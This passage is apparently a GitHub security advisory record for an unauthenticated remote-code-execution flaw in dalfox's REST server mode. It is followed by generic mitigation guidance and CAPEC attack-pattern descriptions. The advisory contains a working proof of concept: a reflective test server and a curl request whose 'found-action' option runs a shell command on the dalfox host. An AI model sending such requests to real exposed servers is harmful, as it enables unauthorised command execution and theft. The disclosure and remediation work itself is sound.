- \u003c\u003c\u0027PY\u0027\nfrom http.server import BaseHTTPRequestHandler, HTTPServer\nfrom urllib.parse import urlparse, parse_qs\nclass H(BaseHTTPRequestHandler):\n def do_GET(self):\n q = parse_qs(urlparse(self.path).query).get(\u0027q\u0027, [\u0027\u0027])[0]\n body = f\u0027\u003chtml\u003e\u003cbody\u003e{q}\u003c/body\u003e\u003c/html\u003e\u0027.encode()\n self.send_response(200)\n self.send_header(\u0027Content-Type\u0027, \u0027text/html\u0027)\n self.send_header(\u0027Content-Length\u0027, str(len(body)))\n self.end_headers()\n self.wfile.write(body)\n def log_message(self, *a): pass\nHTTPServer((\u0027127.0.0.1\u0027, 18081), H).serve_forever()\nPY\n\n# Step 2 \u2014 Start dalfox in REST server mode (default: 0.0.0.0:6664, no API key)\ngo run . server --host 127.0.0.1 --port 16664 --type rest\n\n# Step 3 \u2014 POST unauthenticated scan request with found-action payload\ncurl -s -X POST http://127.0.0.1:16664/scan \\\n -H \u0027Content-Type: application/json\u0027 \\\n --data \u0027{\n \"url\": \"http://127.0.0.1:18081/?q=test\",\n \"options\": {\n \"found-action\": \"echo owned \u003e/tmp/dalfox_rce_marker\",\n \"found-action-shell\": \"bash\",\n \"use-headless\": false,\n \"worker\": 1,\n \"limit-result\": 1\n }\n }\u0027\n\n# Step 4 \u2014 Confirm arbitrary command executed on the dalfox host\ncat /tmp/dalfox_rce_marker\n# Expected output: owned\n```\n\nNo `X-API-KEY` header is required. The reflective server ensures dalfox finds a vulnerability, which triggers `foundAction`.\n\n## Impact\n\n- **Unauthenticated remote code execution** on any host running `dalfox server` in its default configuration.\n- Full read access to secrets, configuration files, and credentials visible to the dalfox process.\n- Arbitrary file writes: persistence, backdoor installation, data exfiltration staging.\n- Lateral movement using the dalfox host\u0027s network position and credentials.\n- The default `0.0.0.0` bind address means exposure to all network interfaces, including public-facing ones in misconfigured cloud environments.\n\n## Recommended Remediation\n\n### Option 1: Require API key \u2014 make `--api-key` mandatory (preferred)\n\nReject server startup when no API key is provided and emit a loud warning. This is the lowest-risk fix because it protects all current and future routes without code changes to the scan path.\n\n```go\n// cmd/server.go \u2014 in runServerCmd, before starting the server:\nif serverType == \"rest\" \u0026\u0026 apiKey == \"\" {\n fmt.Fprintln(os.Stderr, \"ERROR: --api-key is required when running in REST server mode.\")\n fmt.Fprintln(os.Stderr, \" Generate a key with: openssl rand -hex 32\")\n os.Exit(1)\n}\n```\n\n### Option 2: Strip `FoundAction` / `FoundActionShell` from API-sourced requests\n\nPrevent untrusted callers from setting execution-control options regardless of auth state. This adds defence-in-depth and protects authenticated deployments against credential theft.\n\n```go\n// pkg/server/server.go \u2014 in postScanHandler, before calling ScanFromAPI:\nrq.Options.FoundAction = \"\"\nrq.Options.FoundActionShell = \"\"\n```\n\nBoth options should be applied together. Option 1 prevents unauthenticated access; Option 2 ensures that even authenticated callers (who may be external consumers of the REST API) cannot trigger host-level command execution.\n\n##Credit\n\nEmmanuel David\n\nGithub:- https://github.com/drmingler",
"id": "GHSA-v25v-m36w-jp4h",
"modified": "2026-06-08T23:50:00Z",
"published": "2026-05-12T15:07:59Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/hahwul/dalfox/security/advisories/GHSA-v25v-m36w-jp4h"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-45087"
},
{
"type": "PACKAGE",
"url": "https://github.com/hahwul/dalfox"
},
{
"type": "WEB",
"url": "https://github.com/hahwul/dalfox/releases/tag/v2.13.0"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Dalfox Server Mode Vulnerable to Unauthenticated Remote Code Execution via `found-action`"
}
Mitigation MIT-46
Strategy: Separation of Privilege
- Compartmentalize the system to have "safe" areas where trust boundaries can be unambiguously drawn. Do not allow sensitive data to go outside of the trust boundary and always be careful when interfacing with a compartment outside of the safe area.
- Ensure that appropriate compartmentalization is built into the system design, and the compartmentalization allows for and reinforces privilege separation functionality. Architects and designers should rely on the principle of least privilege to decide the appropriate time to use privileges and the time to drop privileges.
Mitigation
Because setting manipulation covers a diverse set of functions, any attempt at illustrating it will inevitably be incomplete. Rather than searching for a tight-knit relationship between the functions addressed in the setting manipulation category, take a step back and consider the sorts of system values that an attacker should not be allowed to control.
Mitigation
In general, do not allow user-provided or otherwise untrusted data to control sensitive values. The leverage that an attacker gains by controlling these values is not always immediately obvious, but do not underestimate the creativity of the attacker.
CAPEC-13: Subverting Environment Variable Values
The adversary directly or indirectly modifies environment variables used by or controlling the target software. The adversary's goal is to cause the target software to deviate from its expected operation in a manner that benefits the adversary.
CAPEC-146: XML Schema Poisoning
An adversary corrupts or modifies the content of XML schema information passed between a client and server for the purpose of undermining the security of the target. XML Schemas provide the structure and content definitions for XML documents. Schema poisoning is the ability to manipulate a schema either by replacing or modifying it to compromise the programs that process documents that use this schema.
CAPEC-176: Configuration/Environment Manipulation
An attacker manipulates files or settings external to a target application which affect the behavior of that application. For example, many applications use external configuration files and libraries - modification of these entities or otherwise affecting the application's ability to use them would constitute a configuration/environment manipulation attack.
CAPEC-203: Manipulate Registry Information
An adversary exploits a weakness in authorization in order to modify content within a registry (e.g., Windows Registry, Mac plist, application registry). Editing registry information can permit the adversary to hide configuration information or remove indicators of compromise to cover up activity. Many applications utilize registries to store configuration and service information. As such, modification of registry information can affect individual services (affecting billing, authorization, or even allowing for identity spoofing) or the overall configuration of a targeted application. For example, both Java RMI and SOAP use registries to track available services. Changing registry values is sometimes a preliminary step towards completing another attack pattern, but given the long term usage of many registry values, manipulation of registry information could be its own end.
CAPEC-270: Modification of Registry Run Keys
An adversary adds a new entry to the "run keys" in the Windows registry so that an application of their choosing is executed when a user logs in. In this way, the adversary can get their executable to operate and run on the target system with the authorized user's level of permissions. This attack is a good way for an adversary to run persistent spyware on a user's machine, such as a keylogger.
CAPEC-271: Schema Poisoning
An adversary corrupts or modifies the content of a schema for the purpose of undermining the security of the target. Schemas provide the structure and content definitions for resources used by an application. By replacing or modifying a schema, the adversary can affect how the application handles or interprets a resource, often leading to possible denial of service, entering into an unexpected state, or recording incomplete data.
CAPEC-579: Replace Winlogon Helper DLL
Winlogon is a part of Windows that performs logon actions. In Windows systems prior to Windows Vista, a registry key can be modified that causes Winlogon to load a DLL on startup. Adversaries may take advantage of this feature to load adversarial code at startup.
CAPEC-69: Target Programs with Elevated Privileges
This attack targets programs running with elevated privileges. The adversary tries to leverage a vulnerability in the running program and get arbitrary code to execute with elevated privileges.
CAPEC-76: Manipulating Web Input to File System Calls
An attacker manipulates inputs to the target software which the target software passes to file system calls in the OS. The goal is to gain access to, and perhaps modify, areas of the file system that the target software did not intend to be accessible.
CAPEC-77: Manipulating User-Controlled Variables
This attack targets user controlled variables (DEBUG=1, PHP Globals, and So Forth). An adversary can override variables leveraging user-supplied, untrusted query variables directly used on the application server without any data sanitization. In extreme cases, the adversary can change variables controlling the business logic of the application. For instance, in languages like PHP, a number of poorly set default configurations may allow the user to override variables.